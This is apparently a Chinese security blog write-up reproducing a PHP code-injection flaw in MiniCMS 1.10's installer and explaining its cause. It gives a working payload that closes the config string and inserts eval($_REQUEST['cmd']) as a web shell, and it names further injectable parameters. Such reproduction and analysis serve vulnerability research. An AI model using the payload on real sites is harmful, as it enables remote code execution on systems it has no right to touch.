type
status
date
slug
summary
tags
category
icon
password
最后编辑时间
Jul 31, 2023 08:40 AM
漏洞编号
No.
同步状态
状态
Author

简述

根据CVE漏洞情报描述,MiniCMS 1.10 允许通过 install.php sitename 参数执行任意 PHP 代码,这会影响 mc_conf.php 中的 site_name 字段。实际上,漏洞点不止一个sitename参数。

漏洞环境

MiniCMS
bg5sbkUpdated Nov 5, 2024
下载1.10版本
解压后命名将文件夹为minicms,移动文件夹到web目录下,并将minicms目录下的install.txt文件修改为install.php ,访问 http://yourip/minicms/install.php
notion image
(下载的是1.10,不知道为什么显示v1.9)
点击提交并抓包

复现

sitename修改为以上的payload '%29;eval($_REQUEST['cmd']);/* ,返回200
notion image
访问shell http://yourip/minicms/?cmd=phpinfo();
notion image

漏洞成因

代码

查看install.php ,显然,安装完成后这个文件自己删除了,所以需要备份install.txt查看
notion image
首先通过 start_install 参数判断请求操作
notion image
接着判断配置文件 mc-conf.php 是否存在,来判断进行第一次安装还是升级
notion image
来到漏洞关键的代码,如果start_install非空,进行安装,file_put_contentssitelink 等参数直接写进 mc-conf.php 配置文件,同时这5个参数是用户可控的
后续代码创建其他一些索引文件,最后 unlink 删除自身,显然,这个漏洞一般没法利用,逻辑上来说安装完网站后不存在漏洞利用,只能在安装的时候被利用一次,只有监守自盗的可能了。
notion image

配置文件

看看创建后的 mc-conf.php
notion image
很直接简单的拼接,每个参数的格式一样,只需要闭合前面的 ') ,同时注释后续的代码,即可在中间拼接恶意代码。通过测试,注入点并非如通告所说只有sitename,而是sitelinkusernamepasswordnickname均可以作为注入点
 
yonyou nc6.5 InvokerServlet 任意类调用执行漏洞调试对EventLog Analyzer数据库日志功能实现的简单分析
Loading...
3R1C
3R1C
一个普通的干饭人🍚
统计
文章数:
20
最新发布
2025-03-29 ikun日报
2025-3-29
2025-03-28 ikun日报
2025-3-28
2025-03-27 ikun日报
2025-3-27
2025-03-26 ikun日报
2025-3-26
2025-03-25 ikun日报
2025-3-25
2025-03-24 ikun日报
2025-3-24